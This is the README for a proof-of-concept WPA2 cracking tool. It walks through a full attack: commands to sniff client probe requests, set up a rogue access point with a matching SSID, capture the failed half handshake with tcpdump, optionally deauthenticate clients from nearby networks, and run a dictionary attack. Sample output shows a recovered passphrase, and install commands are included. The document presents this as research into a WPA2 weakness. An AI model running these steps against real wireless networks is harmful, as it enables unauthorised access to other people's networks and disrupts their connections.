This is a POC to show it is possible to capture enough of a handshake with a user from a fake AP to crack a WPA2 network without knowing the passphrase of the actual AP.
Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.
Author: Dylan Ayrey
Mandatory arguments: -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID Optional arguments: -d Where to read dictionary from
WPA2-HalfHandshake-Crack Usage Example
To read input pcap file with half handshake (-r sampleHalfHandshake.cap) captured from AP with specified MAC (-m 48d224f0d128) and SSID (-s "no place like 127.0.0.1"):
python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
loading dictionary... 0.00788388022717% done. 250.469172638 hashes per second 0.0143003228938% done. 237.207726195 hashes per second 0.0212346846995% done. 238.343685782 hashes per second 0.0286869656441% done. 243.284719499 hashes per second 0.0353048213093% done. 240.624328943 hashes per second 0.0408005188399% done. 232.44365987 hashes per second 0.0468141355095% done. 229.104042665 hashes per second 0.0534895377457% done. 229.456259021 hashes per second 0.0597908872703% done. 228.302626008 hashes per second 0.0664375162209% done. 228.54339761 hashes per second 0.0731129184571% done. 228.830520246 hashes per second 0.0798170939787% done. 229.162336484 hashes per second 0.0865212695004% done. 229.442956452 hashes per second Passphrase found! interwebs
Capturing half handshakes
To listen for device probes the aircrack suite can be used as follows
sudo airmon-ng start wlan0 sudo airodump-ng wlan0mon
You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted
Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything
Capture traffic on this interface.
In Linux this can be achieved with TCPdump
sudo tcpdump -i wlan0 -s 65535 -w file.cap
(optional) Deauthenticate clients from nearby Wi-Fi networks to increase probes
If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication
How to install WPA2-HalfHandshake-Crack
Installation on Kali Linux
git clone https://github.com/dxa4481/WPA2-HalfHandshake-Crack.git cd WPA2-HalfHandshake-Crack/ sudo python setup.py install